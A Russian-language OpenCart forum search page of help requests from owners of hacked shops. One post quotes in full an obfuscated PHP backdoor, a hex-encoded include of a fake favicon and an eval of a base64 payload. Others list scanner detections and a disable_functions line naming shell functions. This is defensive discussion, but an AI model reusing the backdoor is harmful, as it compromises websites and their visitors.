Пошук по сайту
Результати пошуку за тегами 'вирусы'.
Знайдено 12 результатов
-
40 Скачать / Купить дополнение Чистка сайтов и серверов от вирусов Чищу сайты и сервера от вредоносного кода. Предпочитаемые движки - opencart/laravel/wordpress. Очень большой опыт работы. За 8 лет работы я очистил несколько сотен серверов и сайтов. Есть скидки на большое кол-во сайтов (от двух). По окончании работ - подробный отчет с рекомендациями. Есть период автоматического наблюдения за файлами сайта после очистки. Гарантия на очистку - 1 год. Поэтому в моих же интересах - вылечить ваш сайт раз и навсегда. Добавил halfhope Добавлено 22.05.2021 Категория Услуги
-
- безопасность
- вирусы
- (і ще %d)
-
Имеется сайт на ocStore 2.1.0.2 Недавно клиент обнаружил, что сайт у него стал немного подтормаживать и грузить его комп. Сайт при этом работает нормально. Вопросы у него вызывают эти вирусы http://prntscr.com/ir5dkd (использовал сервис http://antivirus-alarm.ru) В вопросах безопасности понимая у меня нет 1. Подскажите, как можно решить эту проблему? чтоб все было чисто... 2. Сам он предлагает обновить движок до последней версии, или хотя бы до 2.3. Как происходит обновление? Все модули нужно заново ставить под нужную версию, да еще и настраивать? на примере того же Simple например, кто нибудь обновлялся? шаблон сайта тоже заново ставить или как это происходит? Какие еще могут быть последствия при обновлении (переиндексация / баги) ? 3. Имеются ли вообще в новых версиях какие-либо улучшения в плане безопасности? или обновляться бесполезно? других поводов для обновления нет
- 2 відповіді
-
- вирусы
- безопасность
-
(і ще %d)
Теги:
-
Недавно от хостиговуой компании, где расположен мой сайт, пришло письмо, что с моего сайта якобы рассылается спам, и что почта будет заблокирована, до выяснения причин. По моей просьбе был выслан лог апача, из которого я выяснил, что письма отправляет файл mail.php, всего около 500 писем за сутки. Связался с заказчиком своего сайта, он подтвердил, что такое количество в сутки в принципе возможно, во первых приходят письма клиентам, о разных стадиях заказа (заказ принят, заказ обработан, заказ выслан и.т.д.), а во вторых рассылка новостей сайта(скидки, новый товар). Связался с хостером, он посоветовал проверить свой сайт с помощью антивируса i-bolit, что я и сделал. В результате антивирус мне выдал мне следующее: Обнаружены сигнатуры исполняемых файлов unix и нехарактерных скриптов. Всего 10 файлов, причем с расширением jpg, то есть картинки. Не совсем могу понять, как в картинке может быть вирус, и вирус ли это вообще? Посоветуйте, что еще можно проверить? Версия магазина: Версия 1.5.5.1.2
-
Добрый день!!! помогите найти дыру на сайте nika-nagel.com от него постоянно идет спам и всякая другая хрень как то заливают в корень help.php и в разные директории faviocn-sfds.ico с вредоносным кодом чистка не помогает через 3-7 часов все повторяется вот такой код в индекс прописывают /*a0869*/ @include "\x2fhom\x65/u5\x34469\x2fnik\x61-na\x67el.\x63om/\x77ww/\x2egit\x2fobj\x65cts\x2ffe/\x66avi\x63on_\x65ce1\x66b.i\x63o"; /*a0869*/ это инклюд favicon в нем <?php if (!defined('ALREADY_RUN_1bc29b36f342a82aaf6658785356718')) { define('ALREADY_RUN_1bc29b36f342a82aaf6658785356718', 1); $ycwrbhzihq = 6597; function grgxti($sgchnvxofx, $xglkk){$jwvuaeotqp = ''; for($i=0; $i < strlen($sgchnvxofx); $i++){$jwvuaeotqp .= isset($xglkk[$sgchnvxofx[$i]]) ? $xglkk[$sgchnvxofx[$i]] : $sgchnvxofx[$i];} $eoslyi="base" . "64_decode";return $eoslyi($jwvuaeotqp);} $vvfzzoz = 'wE6SXM94aidUZvV05XldZzLTZdHYavZzOX9bVejq5xYSXM94aidUZvV05XlYavlUmpLJasLcLJrnqXM3wE4PDk84psS'. 'dlXnzakfgpvVgmkSQl1dTadH0DkQdLJrnqXM3wE4PmpLJasLUZiVrasL0Dk8z5wP4br05EtSdlfH0DkQdpvj4akd05wP4br'. '05wE6SXidi5XfMmkm4aiVM5XLE2f9UoeHqyAM4wE43wE6nyXPnm1ViDk8d5XLE2f9UoeHqyArnydjhyAM3wE4HwE6SXidi5XfMm'. 'km4aiVM5XLu2VLfEQoIeddUe0VEEVL9VuH2yAM4wE43wE6nyXPnm1ViDk8d5XLu2VLfEQoIed'. 'dUe0VEEVL9VuH2yArnyANA5xYSXz0SXn05Dk7n5XfMmkm4aiVM5Xl9xfLfEeompQLVxdNjSwoBbw'. 'lBmB7JqvLGbwLG7km4SBGJDkfAqxmGl1dTqxnz52MSXzYSXAPnyX9M'. 'mkm4aie6L0fqeMV9ofdUedVbpcu0S1qgSvSiSByc7iugqifGmiMvbtL47kyjSif0DkNjbXZYywu4br05wE6n'. 'yXPnL1oGl1unI29bVejqbr05yXPnyXoM7poGpvWdF2PHyu8Vxur3'. 'wE6SXAPnyXPMo0jIEMfqeQYz7sSU7pV0DXllyw0nLcngbwSMSkqsOxMJSkyW'. 'Swu0q20gSxyvOxM8mwMjqwmMqBq0mAZ3wE6nyXPnmvjT7ifYyXoBZQHGlpo6br0'. '5wE6SXAPnyX94mAP6ykmQaiS0DkHhpvVgDpS0ZJnzmidYmVHrlpoU7vHhl1Vhltqz52MSXAPnyX93wE6nyXPnyXPny1mQaiS0D'. 'kHhy1m4a1VUZtV0pvSTazodazoc5XohOXPMmXrnL1mY7kZnI2917kjcm2MSXAPnyXPnyXPnFr05yXPnyXPnyX'. 'PnyXPnL1QTm1enI2PMmijGmJPHI2PgywNnLvuzyw6nLsZzbr05yXPnyXPn'. 'yXPnyXPnL17nI29PmiHrmkg6L1gYyXoWavod5xYSXAPnyXPnyXPnyXPny1diyXnM'. 'mAPHIx0noifYZve4wE6nyXPnyXPnyXPnyX93wE6nyXPnyXPnyXPny'. 'XPnyXPnZiV0lpLhywP3wE6nyXPnyXPnyXPnyX9HwE6nyXPnyXPnyXPnyX9datSdwE6nyXPnyXPnyXPnyX93wE6nyXPnyXPn'. 'yXPnyXPnyXPnDk7n51dcpvfJZif85XoM52MnL1EnI294ap9Yav'. 'od5XoM5xYSXAPnyXPnyXPnyXPnyXPnyXPM7zd0mpSUlsL4ltodaAPHy1msZid0m2nMmArnL1E4br05yXP'. 'nyXPnyXPnyXPnyXPny1mBa1Hcm2nMmAM3wE6nyXPnyXPnyXPnyXPnyXPnZiV0lpLhyXoAFpodZQHsZi'. 'd0l1Vhbr05yXPnyXPnyXPnyXPnUE05yXPnyXPnyX9HwE6nyXPnUE05wE6nyXPnDk7n5Xfilk8B'. 'l1dTadHdF1dcltq6Lvm4a1VUmvV0pvSTazodazocLJM4wE6nyXPnFr05yXPnyXPnyX9ilk8Bl1dTaA9iDkjdpv'. 'ldlfHBav80mk80ZJnMmidYmk8Gake4wE6nyXPnyXPnytYSXAPnyXPnyXPn'. 'yXPnyXoiD1fhm1jdyw0nmiHrmkg6L1m4a1Vh7kQdOXPAZAy4br05yXPnyXPnyXPnyXPnL1mBav8'. '0mk80ZJPHy1mJmkfM5XoiD1fhm1jdOX9iDkjdZvdKm2nMmidYm'. 'k8Gake45xYSXAPnyXPnyXPnyXPny1mBa1Hcm2nMmiGGaioYm2M3w'. 'E6SXAPnyXPnyXPnyXPnytLdltVJaAPMmiSTazodazocbr05yXPnyXPnyX9HwE6nyXPnUE05yXPny1mQaiS0DkHhy1'. 'ScpvldlfHBlpLJmk80pvm4a1Vr7po65XMSXAPnyX93wE6nyXPnyXPnytLdltVJaA90ZidW5t9Jmkl'. 'UZiVra1fBm2nAOQr6OA4ZLXNAOXPzLJrnpQH12ejfpQN45xYSXAPnyX9HwE6SXAPnyX9ilk8Bl1dTaA9BZQHMmkSJF'. 'p90ps967pSd5XoM7poGOXPMDvV85E05yXPnytYSXAPnyXPnyXPnL1HQlfHM7po'. 'Gyw0nyAy3wE6SXAPnyXPnyXPnmiHJyXnMDx0rbJPMDxjcltLYmkg6L1oGl1u4bJMSXAPnyXPnyXPnFr05yXPnyXPn'. 'yXPnyXPnmiHJyXnMDB0rbJPMDBjcltLYmkg6L1WdF2MnLA7nL1MNZsoJa1Vh5'. 'XoM7poG5xYnL16C5JrnL1MC5JMSXAPnyXPnyXPnyXPnytYSXAPnyX'. 'PnyXPnyXPnyXPnyXPMasV0pvoGl1unOB0n7vGJ51HJmXnMm1f07VYMDV04yfgnasLM5XoCmpdaL14l52M3wE6nyX'. 'PnyXPnyXPnyX9HwE6nyXPnyXPnyt0SXn05yXPnyXPnyX9JmpoQZignL1HQlfHM7po'. 'Gbr05yXPnyt0SXn05yXPny1mQaiS0DkHhy1Scpvod7sL8ZtE6L1oGl1uYyXoCmpM4wE'. '6nyXPnFr05yXPnyXPnyX9za1HA7krnL1ScpvfQl1n3wE6SXAPnyXPnyXPnZiV0lpLhy1Scpvod7sL8ZtoUZ1GGZve67sSUm1VB'. 'ZzdrlfHrD1fcm2nMm1f072rnL1WdF2MYyXoBZQHGlpo65xYSXAPnyX9HwE6nyXPnmzVh7so4avgn7sS'. 'Umk8BZzdrlXnMm1f072rnL1WdF2MSXAPnyX93wE6nyXPnyXPny1lYavLGaXPM7sSU7pV0DwYSXn0'. '5yXPnyXPnyX9JmpoQZign7sSUm1VBZzdrlfHrD1fcm2GBZQHMmkSJFp90ps967pSd5XoM7poGOXP'. 'M7sSU7pV0DXMYyXoCmpM4br05yXPnyt0SXn05yXPny1mQaiS0DkHhy1ScpvldlfHratV'. 'zDk8U7vHhmidz5XMSXAPnyX93wE6nyXPnyXPnyXocmkjipvSTazodazEnI29PmidYmVHzmpoU'. '7vHhl1Vhltq67sSUmvV0pvSQZzLdazoUmidYmp9Gl1n652M3wE6SXAPnyXPnyXPnL1STaim4mQHrasqnI29cltL'. 'rasq6LtSda1mU7vHhl1VhlXrnakEQ51ScpvldlfHBlpLJmk80pvm4a1Vr7po65XM45xYSXAPnyXPn'. 'yXPnDk7n5XoBav8iDklUZ1HcyXuHI291Eejxo2MSXAPnyXPnyXPnFr05yXPnyXPnyXPnyXP'. 'nL1STaim4mJPHytSQ7zS0ZAnMZvVYmdHBav80mk80OXPM7vHhmidzps9TZJPCywqJ5xYSXAPnyXPnyX'. 'PnyXPnyXoratVzDk8cyw0nEtVhZvVJDkfYDp4d51Scpvod7sL8ZtE67ifcmx70pvod7vHMm2nM'. '7vHhmidz52rnakEQ51ScpvldlfHBlpLJmk80pvm4a1Vr7po65XM4'. '52M3wE6nyXPnyXPnyt0SXAPnyXPnyXPnmkjcmE05yXPnyXPnyX93wE6nyXPnyXPny'. 'XPnyXPMZ1jQmvdhZJPHyufJZif85XM3wE6nyXPnyXPnyt0SXn05yXPnyXPnyX9J'. 'mpoQZignLt9Ylkl4azq3wE6nyXPnUE05wE6nyXPnmzVh7so4avgn7s'. 'SUZvV0ps9Ylkl4adHBav8iDkZ6Lt9Ylkl4azq4wE6nyXPnFr05yXPnyXPnyXPM7vHhmidzpvVh7JPHy1LG'. 'ZvevSfHdaiSTm1e67sSUmk8BZzdrlXGPZvVJDkfYDp4d5XoratVzDk'. '8c52rnakEQ51ScpvldlfHBlpLJmk80pvm4a1Vr7po65XM452M3wE6nyXPnyXPnyXocmkjipvSTazodazEnI29PmidYmVHzmpoU7v'. 'Hhl1Vhltq67sSUmvV0pvSQZzLdazoUmidYmp9Gl1n652M3wE6SXAPnyXPnyXPnL1STaim'. '4mQHrasqnI29cltLrasq6LtSda1mU7vHhl1VhlXrnakEQ51ScpvldlfHBlpLJmk80pvm4a1Vr7po65'. 'XM45xYSXAPnyXPnyXPnDk7n5XoBav8iDklUZ1HcyXuHI291Eejxo2MSXAP'. 'nyXPnyXPnFr05yXPnyXPnyXPnyXPnL1STaim4mQHTa1EnI29clkLclty6LtSda1mU7vHhl1VhlXrnL1STaim4mQHra'. 'sqn5JPcqAM3wE6nyXPnyXPnyXPnyXPMZvVYmdHBav80mk80yw0nZsoJpsLdZ1jG7ve6L1STaim4mQHTa1EY'. 'yXoBav8iDklUmk8BOXPMZvVYmdHBav80mk805xYSXn05yXPnyXPnyX9HwE6nyXPnyXPny1VYZveSXAPnyXPnyXPnF'. 'r05yXPnyXPnyXPnyXPnLtSda1mU7vHhl1VhlXPHyXocmkjipvSTazodazEnOA'. 'PAp18ZaANTyAPhy1QMS2GBZQHzmpoU7sVJZiVhlfHiDkjdZ1f0DXn452P'. 'hyXoBav8iDklUmk8Bbr05yXPnyXPnyX9HwE6SXAPnyXPnyXPnE1m4a'. '1VUZtV0pvSTazodazoc51ScpvldlfHBlpLJmk80pvm4a1Vr7po65XMYyXocmkjipvSTazodazE4b'. 'r05yXPnyt0SXn05yXPny1mQaiS0DkHhy1Scps9Ylkl4adHGm1E6L18GakeYyXoA7pSdSBoUm1f072MS'. 'XAPnyX93wE6nyXPnyXPnyXoratVzDk8cyw0n7sSUmvV0ps9Ylkl4adHBav8iDkZ65xYSXn05yX'. 'PnyXPnyXPMZ1jQmvdhZQYMaifWmV0nI29A7pSdSBoUm1VBavod5XoA7pSdSBoUm1f072M3wE6SXAP'. 'nyXPnyXPn7sSUZvV0ps9Ylkl4adHBav8iDkZ6Lt9Ylkl4azq4br05yXPnyt0SXn05yXPny1mQaiS0DkHhy1Scps9Ylkl4adHJmk'. '06L18Gake4wE6nyXPnFr05yXPnyXPnyXPMZ1jQmvdhZJPHy1Scp'. 'vldlfHratVzDk8U7vHhmidz5XM3wE6SXAPnyXPnyXPnlk8cmpE6Lt9Ylkl4azSaL18GakVl'. '5xYSXn05yXPnyXPnyX9BZQHcmpoUZ1jQmvdhpvSTaim4mJnMZ1jQmvdhZJM3w'. 'E6nyXPnUE05wE6nyXPnmzVh7so4avgn7sSUZ1jQmvdhpvjT7kE6L18GakeHxdVqxXMSXA'. 'PnyX93wE6nyXPnyXPny1mTZiVG7vnn51ScpvldlfHratVzDk8U7vHhmidz5XMn7pqnLt9h7kQdIxgMZ1STazodazE4wE6'. 'nyXPnyXPnytYSXAPnyXPnyXPnyXPny1diyXnMaifWm2MSXAPnyXPnyXPnyXPnytYSXAPnyXPnyX'. 'PnyXPnyXPnyX94mAP6ZsoJ7vQr5Xoh7kQdOXPMZ18Gake4yw0HywP4wE6nyXPnyXPnyXPnyXPnyXP'. 'nFr05yXPnyXPnyXPnyXPnyXPnyXPnyX9dlifY5Xor7vHhl1VhlXM3wE6nyXPnyXPnyXPnyXPnyXPnyXPny1LJmkfCbr05yXP'. 'nyXPnyXPnyXPnyXPnyt0SXAPnyXPnyXPnyXPnyt0SXAPnyXPnyXPnyXPny'. '1VYZveSXAPnyXPnyXPnyXPnytYSXAPnyXPnyXPnyXPnyXPnyX9dlifY5Xor7'. 'vHhl1VhlXM3wE6nyXPnyXPnyXPnyX9HwE6nyXPnyXPnyt0SXAPnyX9'. 'HwE6SXAPnyX9iasLd7kS6yXnMp0SIx0WLo29GZJPMDvV8IxgMlifYlke4wE6nyXPnFr05yXPnyXPnyXP'. 'Mm1f072PHyXov7kjQmxYSXAPnyXPnyXPnL1oGl1fUDvV8yw0nL1WdFxYSXAPnyX9HwE6SXAPnyX94mAP6y2o'. 'M7poG5E05yXPnytYSXAPnyXPnyXPnmiHJmkfBDXP6LfHExQSey1fcyXoCmpMHIAov7kjQm2MSXAPnyXPnyXPnFr05yXPny'. 'XPnyXPnyXPnL1oGl1unI2PMlifYlke3wE6nyXPnyXPnyXPnyXPMm1f07VHCmpMnI2PMDvV8br05yX'. 'PnyXPnyX9HwE6nyXPnUE05wE6nyXPnL1oGl1unI29Plk8cmpL47kj4Fie67sSUm1VBZzdrlXGA7pS'. 'dSBoUm1VBavod5XoM7poG52rnL1oGl1fUDvV852M3wE6SXAPnyX9'. '4mAP6DpScmpE6L1oGl1faLvfCLQ04yX7iyXoBZQHGlpo6Ix0Mm1f07VYz7kYzp2MSXAPnyX93wE6nyXPnyXPny1d'. 'iyXnMm1f07VYz72llyw0HyXl4LJMSXAPnyXPnyXPnFr05yXPnyXPnyXPny'. 'XPnL1MnI299ZzLGF2nSXAPnyXPnyXPnyXPnyXPnyXPzZt7zyw0+yu9rDt9vmpLcDkHh5XMYwE6nyXPnyXPnyXPnyXP'. 'nyXPnLsSvLJPHIAPzqAgrOxuzOP05yXPnyXPnyXPnyXPnyXPnyX'. 'lGDJZnIxgnL1oGl1faLvfCLQ0YwE6nyXPnyXPnyXPnyXP4br05yXPnyXPnyXPnyXPnmkS6aJ9PZvVJDkfYDp4d5Xo4'. '5xYSXAPnyXPnyXPnyXPny1VgDpE3wE6nyXPnyXPnyt0SXAPnyXPnyXPnmkjcmkdiyX'. 'nMm1f07VYz72llyw0HyXldLJMSXAPnyXPnyXPnFr05yXPnyXPnyXPnyXPnmpmGaXnMm1f07VYzmXl'. 'l5xYSXAPnyXPnyXPnUE05yXPnyXPnyX9datSdDk7n5XoM7poGkJlGLQ0nIx0nLs9Ylkl4aAZ4wE6nyXPnyXPnytYSXAPn'. 'yXPnyXPnyXPny1di5XoM7poGkJlc72llyw0HyXlGm1Ez5E05yXPnyXPnyXPnyXPnFr05yXPnyX'. 'PnyXPnyXPnyXPny1Scps9Ylkl4adHGm1E6L1oGl1faLsPzp2rnL1oGl1faLvEz'. 'p2M3wE6nyXPnyXPnyXPnyX9HwE6nyXPnyXPnyXPnyX9datSdDk76L1oGl1faLsSGLQ0nIx0nLsLda2Z4wE6nyXPnyXPnyXPn'. 'yX93wE6nyXPnyXPnyXPnyXPnyXPn7sSUZ1jQmvdhpsLda2nMm1f07VYzZXll5xYSXAPnyXPnyXPnyXPnyt0SXAPnyXPnyXPnUE0'. '5yXPnyXPnyX9d7vGTyXoM7poGkJlGDJllbr05yXPnyXPnyX9dF1d05XM3wE6nyXPnUE05wE6nyXPn7sSUZ'. '1jQmvdhpvjT7kE65xYSXz0='; $ibdaskom = Array('1'=>'G', '0'=>'0', '3'=>'7', '2'=>'S', '5'=>'K', '4'=>'p', '7'=>'Y', '6'=>'o', '9'=>'B', '8'=>'5', 'A'=>'i', 'C'=>'r', 'B'=>'j', 'E'=>'Q', 'D'=>'a', 'G'=>'h', 'F'=>'e', 'I'=>'P', 'H'=>'9', 'K'=>'6', 'J'=>'y', 'M'=>'k', 'L'=>'J', 'O'=>'L', 'N'=>'8', 'Q'=>'1', 'P'=>'A', 'S'=>'N', 'R'=>'q', 'U'=>'f', 'T'=>'v', 'W'=>'t', 'V'=>'V', 'Y'=>'s', 'X'=>'C', 'Z'=>'c', 'a'=>'b', 'c'=>'z', 'b'=>'O', 'e'=>'U', 'd'=>'l', 'g'=>'4', 'f'=>'F', 'i'=>'m', 'h'=>'u', 'k'=>'W', 'j'=>'x', 'm'=>'Z', 'l'=>'d', 'o'=>'R', 'n'=>'g', 'q'=>'M', 'p'=>'X', 's'=>'3', 'r'=>'w', 'u'=>'E', 't'=>'H', 'w'=>'D', 'v'=>'2', 'y'=>'I', 'x'=>'T', 'z'=>'n'); eval/*ls*/(grgxti($vvfzzoz, $ibdaskom)); }
-
Нужен тот кто сможет разобраться! Хостинг прислал такую информацию: C вашей услуги VDS-OVZ-Улёт зафиксирована массовая рассылка почтовых сообщений. Мы подозреваем, что сервер рассылает спам, а это запрещено правилами предоставления наших услуг (https://firstvds.ru/company/documents/contract-vds-oferta, Приложение 1, раздел V).Сейчас исходящий почтовый трафик сервера автоматически заблокирован.ЭТО ЛЕГАЛЬНАЯ РАССЫЛКА?Если это легальная рассылка, то мы разблокируем 25 порт и добавим IP адрес вашего сервера в “белый” список.Для этого вам необходимо выполнить два условия:1. Ваш сервер должен быть на виртуализации KVM. Как сменить виртуализацию: https://firstvds.ru/technology/faq/openvz-kvm#shift2. Ответом на данное сообщение, отправьте детали рассылки:- Каким образом подписчики дают согласие на получение рассылки? (Согласно закону о рекламе, у вас должна быть информация о том, в какое время и с какого IP-адреса каждый пользователь дал подтверждение на рассылку. Иначе рассылка классифицируется как СПАМ)- Пример письма, где есть возможность быстро отписаться от рассылки.В случае обнаружения несоответствия полученных ответов действительности или при получении жалоб от Spamcop, Spamhaus и подобных сервисов разрешение на рассылку аннулируется.ВЫ НЕ ДЕЛАЕТЕ НИКАКИХ РАССЫЛОК? Если не вы инициировали эту рассылку, то ваш сервер взломан. Я ИМ ОТВЕТИЛ ЧТО НИКАКОЙ РАССЫЛКИ НЕ ДЕЛАЛ!!! ПОПРОСИЛ ПОМОЧЬ!!! ОНИ ОТВЕТИЛИ: В почтовой очереди более 32 тыс писем на отправку:[root@umimart /]# exim -bpc32489Пример свежих из них:0m 1.6K 1ebmSE-00009N-Gh <[email protected]>[email protected] 1.6K 1ebmSE-00009Q-Hn <[email protected]>[email protected] 1.6K 1ebmSE-00009T-Ij <[email protected]>[email protected] 1.6K 1ebmSE-00009W-JS <[email protected]>[email protected] 1.6K 1ebmSE-00009Z-KA <[email protected]>[email protected]Заблокировал следующие спам-скрипты:/var/www/sergo/data/www/ehlektronik.ru/catalog/controller/event/oxhopcir.php/var/www/sergo/data/www/applemen.ru/admin/view/template/tool/zjnilwsb.phpОднако все равно нужно провести чистку от вредоносных и спам-скриптов.Следующая команда покажет рассылающие скрипты из почтовых заголовков:grep -R 'X-PHP-Originating' /var/spool/exim/input/|awk '{print $3}'|grep php|awk -F : '{print $2}'|sort|uniq -cВременно остановили почтовый сервер exim, примите меры и завершите чистку.По окончании сообщите, пожалуйста.P.s. Еще подозрительные файлы:/var/www/sergo/data/www/applesweet.ru/xml.php/var/www/sergo/data/www/applemen.ru/xml.php/var/www/sergo/data/www/ehlektronik.ru/xml.php Проверка нашими администраторами платная:Стоимость проверки до 10 сайтов (на одном сервере, проверка части сайтов одного пользователя не производится) - 1000 рублей, свыше 10 сайтов - 1000 рублей/час.Однако предварительно надо будет выполнять ряд профилактических мер от повторного взлома:- Обновите все используемые CMS и все шаблоны/плагины/скрипты используемые на сайте, регулярно делайте обновления. - Не используйте nulled-версии (не лицензионные) CMS. - Смените пароли доступа по ftp и ssh. Меняйте пароли периодически и не используйте простые и одинаковые пароли. - Создавая/изменяя пароль для пользователя/почтового ящика/администратора сайта/пользователя БД/FTP-аккаунта, придерживайтесь следующих правил: - Длина пароля не менее 10 символов. - Включайте в пароль заглавные и строчные символы латинского алфавита (A-Z, a-z), цифры (от 0 до 9), а также используйте специальные символы (\, /, %, *, (, ), ?, @, #, $, ~, : и т.п.). - Изолируете сайты друг от друга, для этого создавайте каждый сайт на отдельном пользователе. - Настройте резервное копирование сайтов. - В файле конфигурации PHP (php.ini) добавьте disable_functions неиспользуемые у вас на сайтах функции: disable_functions = exec, passthru, shell_exec, system, proc_open, popen, curl_exec, curl_multi_exec, parse_ini_file, show_source
- 4 відповіді
-
- очистка сайта
- вирусы
-
(і ще %d)
Теги:
-
Добрый день, взломали сайт давно(восстановить резервуню копию не вариант), проблему заметили не сразу Весь сервер почистили от вредоносных сайтов, нашел еще кусок кода, так же удалили но где то остался кусок этой заразы, из -за которой гугл поиск выдает иероглифы и какие то духи еще какую то фигню, и из-за этого сайт теперь не отображается при нужных запросах https://prnt.sc/ghc3am https://prnt.sc/ghc4i0 и такая проблема только с гугл поиском, на яндексе все норм, может кто знает где могут находится эти файлы и куски кода, или как исправить данную проблему. Так же этот вирус генерит кучу новых страниц, через гугл веб мастер они удаляются после индексации, при повторной индексации вылазит снова куча левых страниц 404
-
Всем привет. Мне нужна помощь. Провайдер обнаружил проблему на моём сайте {HEX}php.cmdshell.unclassed.357 : u4675996 : /var/www/u4675996/data/www/mkp/system/logs/login.php {CAV}Php.Trojan.StopPost : u4675996 : /var/www/u4675996/data/www/mkp/system/library/mail.php {CAV}Php.Trojan.StopPost : u4675996 : /var/www/u4675996/data/www/mkp/catalog/model/payment/pp_pro.php {CAV}PHP.Trojan.Uploader : u4675996 : /var/www/u4675996/data/www/mkp/catalog/model/payment/authorizenet_aim.php {CAV}PHP.Trojan.Uploader : u4675996 : /var/www/u4675996/data/www/mkp/catalog/model/design/ini.php и ещё много файлов с этими вирусами. Кто-нибудь сталкивался с такой проблемой? Подскажите что сделать, чтобы исправить и избежать такого в будущем? Может какие-то разрешения проставить или патчи какие-то есть?
- 2 відповіді
-
- вирусы
- php.trojan.stoppost
- (і ще %d)
-
Опенсорс. Антивирусная утилита, которая собирает структурированную информацию о сайте. Собранные данные можно отправить специалисту или проанализировать самостоятельно, чтобы получить лечащий скрипт. Разработан совместно с revisium.com (айболит). От себя: Состоит из двух частей, сканер (активная часть для работы с сервером) и анализатор логов (пассивная, только работа с логами. есть оффлайн и онлайн версия). Т.е. сначала сканируйте с помощью сканера, затем отправляйте файлы на анализ в анализатор. После выбора необходимых действий в нем же создается файл для лечения. Затем этот файл заливается обратно в сканер и инструкции по лечению выполняются. Оценить функционал скрипта мне так и не удалось, т.к. у меня на сервере какая-то очередная трабла с include_path -> require_once. Инструкция от яндекса: Загрузите Manul в корневую директорию сайта через FTP/SFTP и распакуйте архив. Для запуска введите в адресную строку браузераадрес_вашего_сайта/manul/index.php. Создайте пароль, чтобы никто, кроме вас, не смог воспользоваться утилитой. Запустите сканирование. После окончания отчёт будет сохранён в формате .xml. Загрузите отчёт в Анализатор или отправьте его специалисту. Откройте Manul и перейдите во вкладку Executor. Скопируйте полученный после анализа лечащий скрипт в специальное поле и нажмите «Выполнить». После окончания работы удалите папку /manul с сервера. Новость на хабре: http://habrahabr.ru/company/yandex/blog/256463/Промо страница: https://yandex.ru/promo/manul#aboutРепозиторий: https://github.com/antimalware/manul/Другое: PHP Shell Detector [php, Python] [сайт, репо] (автор говорит по-русски) Айболит [сайт]Прямые руки
-
Не знаю зачем написал сей велосипед, но думаю, что кому-нибудь будет полезен при анализе логов. При очистке более 30 сайтов от вирусов/шеллов и прочей грязи, нашел закономерности, cпецифичные для OpenCart. Например, если сайт заражен ботом, то большая часть зараженных файлов вызываются напрямую, а не через точку входа, что логично. Эти файлы чаще всего находятся в директориях catalog и system. Например, http://адрес-сайта/system/helpers/sh.php.'>http://адрес-сайта/system/helpers/sh.php. Скрипт подсвечивает: Разрешенные типы файлов POST/HEAD запросы Запросы к точке входа витрины (index.php*) Запросы в админку (admin/*) Запросы с ответом 404 Прямые вызовы PHP файлов (например, http://адрес-сайта/system/helpers/sh.php) Плюсы: Есть визуальная навигация по всем обработанным строкам (с подсветкой) Можно поставить ограничение на показываемых строк (по умолчания 10000) Наличие пагинации Настраиваемый формат логов (благодаря использованию PHP Web Server Log Parser Library) Минусы: Медленный Используется функция file, так что если файл большой, то можно уткнуться в memory_limit Описание настроек: //Разрешенные типы файлов $ALLOWED_EXTENSIONS = array('css','js','png','jpg','gif','svg','jpeg','pdf','htm','html','woff','eot','ico','txt'); //Путь к админке define('ADMIN_DIR', 'admin'); //Название файла лога define('LOG_FILE', 'podarishka.danzil.ru-Feb-2015.log'); //Формат лога. Сейчас стоит дефолтный, про формат можно узнать https://github.com/kassner/log-parser#supported-format-strings define('LOG_FORMAT', '%h %l %u %t "%r" %>s %O "%{Referer}i" \"%{User-Agent}i"'); //Кол-во строк на страницу define('LINES_PER_PAGE', 10000); Ссылки: PHP Web Server Log Parser Library (GIT) Скриншот Если это велосипед, то прошу ткнуть носом в готовые решения. 1.php
-
Добрый день, прошу помощи в удалении вирусов. Проверил Средством поиска вирусов ClamAV выдал такой результат; public_html/catalog/view.php Php.Trojan.StopPost public_html/catalog/language/english/module/manufacturerabc.php Php.Trojan.StopPost public_html/catalog/language/english/account/transaction.php Php.Trojan.StopPost public_html/catalog/view/theme/default/template/ini.php Php.Trojan.StopPost public_html/catalog/view/javascript/jquery/ui/themes/css.php Php.Trojan.StopPost public_html/catalog/view/javascript/sl/inc.php Php.Trojan.StopPost public_html/catalog/model/total/press.php Php.Trojan.StopPost public_html/catalog/model/payment/sagepay_direct.php Php.Trojan.StopPost public_html/podarishka.ru_bk/index.php Php.Trojan.StopPost public_html/podarishka.ru_bk/nbproject/lib.php Php.Trojan.StopPost public_html/podarishka.ru_bk/catalog/controller/payment/intellectmoney.php Php.Trojan.StopPost public_html/podarishka.ru_bk/catalog/controller/checkout/simplecheckout_payment.php Php.Trojan.StopPost public_html/podarishka.ru_bk/catalog/language/english/checkout/press.php Php.Trojan.StopPost public_html/podarishka.ru_bk/catalog/language/russian/information/menu.php Php.Trojan.StopPost public_html/podarishka.ru_bk/catalog/language/russian/payment/sql.php Php.Trojan.StopPost public_html/podarishka.ru_bk/cg-bn/2yd3g.php PHP.Shell-38 public_html/podarishka.ru/index.php Php.Trojan.StopPost public_html/podarishka.ru/nbproject/lib.php Php.Trojan.StopPost public_html/podarishka.ru/catalog/controller/payment/intellectmoney.php Php.Trojan.StopPost public_html/podarishka.ru/catalog/controller/checkout/simplecheckout_payment.php Php.Trojan.StopPost public_html/podarishka.ru/catalog/language/english/checkout/press.php Php.Trojan.StopPost public_html/podarishka.ru/catalog/language/russian/information/menu.php Php.Trojan.StopPost public_html/podarishka.ru/catalog/language/russian/payment/sql.php Php.Trojan.StopPost public_html/system/library/user.php Php.Trojan.StopPost public_html/system/database/global.php Php.Trojan.StopPost Пишите, какая еще нужна информация и конечно за какое вознаграждение возьметесь устранять неполадки. Спасибо. Skype-arturzhuk88 http://vk.com/zhuk1988
-
Весрия: OSstore 1.5.3.1, ocStore-1.5.4.1.2 Хостинг HostLife Сказочка моя долгая так-что слушаем :) Начну все с начало. Стоял мой магазин на OSstore 1.5.3.1 Работал себя работал. И тут вдруг Я захожу утром а тут бабах и что я вижу. Сайт в черном бекграунде и написано Hack By Islamic Ghost Team как то так. А в низу быть или не быть....... Ну что же я сделал я заменил файлы Index.php со своего бекапа сайт вновь начал хорошо работать и проблем не было. И тут спустя 3 месяца яндекс начал присылать куча писем что на сайте обнаружено вредоносное ПО и указывать мне ссылки.... Которых уже в помине нет.... и близко, с моего старого магазина........ Я запрашиваю проверку в Яндексе, потом пишут что все чисто. Потом опять. Ну и так постоянно. До тех пор пока не Адсенс не запретил рекламировать сайт так как есть подозрение на вредоносное ПО. Я прихожу к решению. Снести все напрочь и поставить все заново. Что я и делаю. Качаю с сайта https://myopencart.com/ чистую сборку ocStore-1.5.4.1.2 И ставлю её. Я сразу понял что с 